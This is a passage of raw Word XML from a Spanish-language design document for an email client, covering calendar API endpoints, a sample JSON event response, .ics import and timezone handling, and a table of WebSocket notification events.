              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/calendars/sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sincroniza calendarios vía CalDAV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">accountId?: string</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">force?: boolean</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(default: false)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/calendars/events/:id/ics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descarga evento como archivo .ics</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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/emails/:emailId/ics/import</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Importa evento desde adjunto .ics de email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de response para eventos de calendario:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Response GET /api/calendars/:calendarId/events?start=2026-01-01&amp;end=2026-01-31</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"events"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"507f1f77bcf86cd799439050"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"uid"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"event-uid-123@ejemplo.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"summary"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Reunión de planificación Q1"</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"Revisión de objetivos trimestrales"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"location"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Sala de conferencias A"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"startDate"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2026-01-20T14:00:00Z"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"startTimezone"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"America/Mexico_City"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"endDate"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2026-01-20T15:30:00Z"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"endTimezone"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"America/Mexico_City"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"allDay"</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"organizer"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Organizador"</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"org@empresa.com"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"attendees"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Participante 1"</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"p1@empresa.com"</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"accepted"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"role"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"required"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Participante 2"</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"p2@empresa.com"</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"needs-action"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"role"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"required"</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"alarm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"triggerMinutes"</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"method"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"display"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>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"confirmed"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"calendarName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Trabajo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"calendarColor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"#4285f4"</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El endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/emails/:emailId/ics/import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parsea el adjunto .ics del email usando ical.js, la librería estándar de Mozilla para parsing/generación de iCalendar (RFC 5545), y crea un evento en la colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">events</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vinculado al email fuente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[197]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El usuario puede aceptar o declinar la invitación directamente desde la vista del email, y el sistema envía la respuesta iTip (RFC 5546) al organizador vía el servidor CalDAV usando tsdav</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[190]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El manejo de timezones utiliza la base de datos IANA para conversiones, almacenando las fechas en UTC internamente y aplicando la zona horaria del usuario solo en el momento de renderizado. Esta estrategia evita los bugs recurrentes causados por definiciones VTIMEZONE inconsistentes entre clientes, especialmente Outlook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[155]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[156]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="96"/>
    <w:bookmarkStart w:id="97" w:name="notificaciones-en-tiempo-real-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.9 Notificaciones en Tiempo Real</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aunque la mayoría de las operaciones siguen el modelo request/response REST, las notificaciones push de nuevos emails utilizan WebSocket sobre Socket.IO para entrega en tiempo real.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Evento WS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dirección</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">email:new</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server → Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{accountId, folderId, email: EmailHeader, unseenCount}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nuevo email recibido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">email:flagChanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server → Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{accountId, emailId, flags: EmailFlags}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Flags modificados (leído, destacado)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">folder:countChanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server → Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{accountId, folderId, totalMessages, unseenMessages}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contadores actualizados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
